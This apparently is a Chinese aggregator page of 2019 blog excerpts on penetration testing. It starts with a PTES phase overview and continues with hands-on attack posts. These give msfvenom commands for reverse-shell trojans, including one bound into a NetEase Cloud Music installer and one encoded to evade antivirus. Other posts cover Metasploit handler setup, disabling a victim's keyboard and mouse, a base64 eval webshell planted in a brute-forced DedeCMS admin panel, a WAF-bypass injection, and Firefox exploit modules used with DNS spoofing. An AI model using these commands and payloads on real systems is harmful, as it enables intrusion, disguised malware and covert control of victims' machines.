渗透测试

渗透测试的本质与各阶段

守給你的承諾、 提交于 2019-11-26 20:40:57
PTEST 渗透测试标准 1:前期交互阶段 在前期交互(Pre-Engagement Interaction)阶段,渗透测试团队与客户组织进行交互讨论,最重要的是确定渗透测试的范围、目标、限制条件以及服务合同细节。该阶段通常涉及收集客户需求、准备测试计划、定义测试范围与边界、定义业务目标、项目管理与规划等活动。 2:情报收集阶段 在目标范围确定之后,将进入情报搜集(Information Gathering)阶段,渗透测试团队可以利用各种信息来源与搜集技术方法,尝试获取更多关于目标组织网络拓扑、系统配置与安全防御措施的信息。 渗透测试者可以使用的情报搜集方法包括公开来源信息查询、Google Hacking、社会工程学、网络踩点、扫描探测、被动监听、服务查点等。而对目标系统的情报探查能力是渗透测试者一项非常重要的技能,情报搜集是否充分在很大程度上决定了渗透测试的成败,因为如果你遗漏关键的情报信息,你将可能在后面的阶段里一无所获。 3:威胁建模阶段 在搜集到充分的情报信息之后,渗透测试团队的成员们停下敲击键盘,大家聚到一起针对获取的信息进行威胁建模(Threat Modeling)与攻击规划。这是渗透测试过程中非常重要,但很容易被忽视的一个关键点。通过团队共同的缜密情报分析与攻击思路头脑风暴,可以从大量的信息情报中理清头绪,确定出最可行的攻击通道。 4:漏洞分析阶段

信息安全+渗透测试+攻防框架

浪尽此生 提交于 2019-11-26 17:40:19
1、WAF攻击 如何绕过WAF的防御策略: 攻击方 进行SQL注入 尝试绕过WAF检测, 攻击结果: 攻击方通过构造超长数据包,成功绕过WAF规格检测,并SQL注入获取数据库名,防守无法检测 ,对应的策略是升级WAF规格,调整策略 来源: https://www.cnblogs.com/xinxianquan/p/11326017.html

记一次织梦cms渗透测试

北城以北 提交于 2019-11-26 14:05:52
记一次织梦cms渗透测试 0x01 前言 本次测试的整个流程:枚举用户名-针对性暴破-登录后台-后台编辑php文件getshell。 0x02 过程 1、登录功能模块存在用户名枚举缺陷,利用此权限先枚举出用户名 2、登录功能模块无验证码,通过枚举出的用户名暴力破解出相应密码。并登录后台(dedecms v57) 3、开始遇到坑了。文件式管理器上传文件和新增广告等方式都无法getshell(貌似有waf)。一有动作,连接就会重置。 4、尝试直接编辑原有文件,将代码写入。 (1)写入phpinfo();可以成功 (2)写入常规一句话也能成功,但是执行时,连接会被重置 (3)写入base64编码一句话<?php @eval(base64_decode($_POST[‘0nth3way’]));?>,将数据编码后就可以成功执行了 5、菜刀修改配置文件caidao.conf如下,便可连接一句话木马。 <PHP_BASE> ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&id=%s </PHP_BASE> 6、菜刀成功连上一句话。权限:IIS用户 7、看到一个名为wkds.exe的进程,感觉是防护软件,没有深究。 8、第二天就凉了。 (1)马子还在,菜刀连不上了。能执行phpinfo();,不能执行system(‘whoami’)

兴趣之渗透测试学习

旧时模样 提交于 2019-11-26 09:25:28
一、msf框架 1、 生成木马程序: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘0x00’ LHOST=192.168.123.126 LPORT=5555 -f exe > asd.exe 进入程序:msfconsole 使用handler模块:use exploit/multi/handler 设置PAYLOAD:set PAYLOAD windows/meterpreter/reverse_tcp 设置控制端ip和端口:set lhost set lport 攻击:exploit 2、正常软件绑定木马程序 生成木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.123.126 lport=5555 -x 网易云音乐.exe -k -f exe -o 网易云音乐.exe 3、杀毒软件免杀木马程序 生成木马:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -x calc.exe lhost=192.168.123.126 lport=444 -f exe -o

kali linux metasploit的web渗透测试(二)-内网火狐浏览器渗透拿权限

假装没事ソ 提交于 2019-11-26 09:25:04
这一章,介绍如何利用metasploit进行火狐浏览器的渗透拿权限,需要在内网环境下 需要利用的技术是:可以使用ettercap(dns欺骗)或者mitmf(插入一段html地址),这两项技术就不再这里介绍与操作了,如何操作,请自行百度! 利用的模块有:exploit/multi/browser/firefox_webidl_injection,exploit/firefox/local/exec_shellcode ----绕过360拿shell 第一个模块:firefox_webidl_injection 是生成一个攻击链接,然后使用ettercap的dns欺骗或者mitmf插入这段攻击链接,只要让受害者访问这个链接,就会返回一个shell firefox的session 。 第二个模块:exec_shellcode是把上一个模块获取到的shell firefox session 提升为meterpreter,拿到meterpreter,然后进行进一步的渗透,下面介绍使用方法 打开metasploit,使用use来调用这两个模块 第一个模块:firefox_webidl_injection 对火狐浏览器使用的版本有限制,使用info命令查看Description的详情来查看适用版本范围 这里显示对firefox 22-27版本的才有效,于是我在kali

kali渗透测试win10

喜你入骨 提交于 2019-11-26 09:23:41
通过msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe 把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接 在kali中 msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 172.16.4.3 #设置本地ip lhost => 172.16.4.3 msf exploit(multi/handler) > set lport 44444 #设置本地端口 lport => 44444 msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 172.16.4.3:44444 tcp链接以后可以使用以下功能 uictl开关键盘/鼠标 uictl [enable/disable] [keyboard/mouse/all

kali渗透测试win7

半世苍凉 提交于 2019-11-26 09:23:26
通过msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe 把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接 在kali中 msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 172.16.4.3 #设置本地ip lhost => 172.16.4.3 msf exploit(multi/handler) > set lport 44444 #设置本地端口 lport => 44444 msf exploit(multi/handler) > exploit tcp链接以后可以使用以下功能 uictl开关键盘/鼠标 uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标 uictl disable mouse #禁用鼠标 uictl

【安全】Web渗透测试(全流程)

懵懂的女人 提交于 2019-11-25 19:56:56
1 信息收集 1.1 域名、IP、端口 域名信息查询:信息可用于后续渗透 IP信息查询:确认域名对应IP,确认IP是否真实,确认通信是否正常 端口信息查询:NMap扫描,确认开放端口 如果不会用Nmap,看这里: NMAP 基础教程(功能介绍,安装,使用) 发现:一共开放两个端口,80为web访问端口,3389为windows远程登陆端口,嘿嘿嘿,试一下 发现:是Windows Server 2003系统,OK,到此为止。 1.2 指纹识别 指纹?其实就是网站的信息。比如通过可以访问的资源,如网站首页,查看源代码: 看看是否存在文件遍历的漏洞(如图片路径,再通过../遍历文件) 是否使用了存在漏洞的框架(如果没有现成的就自己挖) 2 漏洞扫描 2.1 主机扫描 Nessus 如果不会用Nessus,看这里: 【工具-Nessus】Nessus的安装与使用 经典主机漏扫工具,看看有没有CVE漏洞: 2.2 Web扫描 AWVS(Acunetix | Website Security Scanner)扫描器 如果不会用AWVS,看这里: 【工具-AWVS】AWVS安装与使用 PS:扫描器可能会对网站构成伤害,小心谨慎使用。 3 渗透测试 涉及工具的学习: DVWA: 【工具-BurpSuite】BurpSuite专业版 安装和使用 Burp Suite: 【工具-DVWA

渗透测试的基本流程 11/25

独自空忆成欢 提交于 2019-11-25 19:06:56
0X00 前言 按照老师的要求,我也开始了每天坚持写博的第2天。记录一下自己的学习情况和轨迹,毕竟自己手打出来的才是属于自己的。 0X01 什么是渗透测试?以及渗透测试的相关标准(PTES) 渗透测试是通过模拟黑客的攻击方法来评估计算机网络系统的安全问题。类型取决于公司和组织的用途和范围。 入门的渗透测试,首先要了解渗透测试的流程、步骤与方法。尽管目标环境各不相同,但依然可以用一些标准化的方法体系进行规范和限制。 黑盒:测试者没有应用程序的许多信息,有责任收集有关目标网络,系统或应用程序的信息。 白盒:测试者将获得有关网络,系统或应用程序的完整信息以及源代码,操作系统详细信息和其他所需信息。它可以被认为是模拟内部来源的攻击。 灰盒:测试者将具有应用程序或系统的部分知识。可被认为是外部黑客的攻击,黑客已经非法访问组织的网络基础设施文档。 0x02 0.前期交互: 确定项目范围,周期,采用的技术手段和工具,以及其他约束条件 (比如不可使用一些钓鱼,DDOS等影响系统的方法) 1.信息收集: 收集目标相关的资产信息,包括域名,IP,邮箱,防御措施等 2.威胁建模: 利用已经收集的信息对目标资产进行分析,获得可能存在的威胁,并规划攻击路径 漏洞分析 :发现目标系统和应用中存在的漏洞(判断是否存在) 漏洞利用 :对已发现的漏洞使用攻击向量进行攻击(比如常见的9种) 3.后渗透: 建立立足点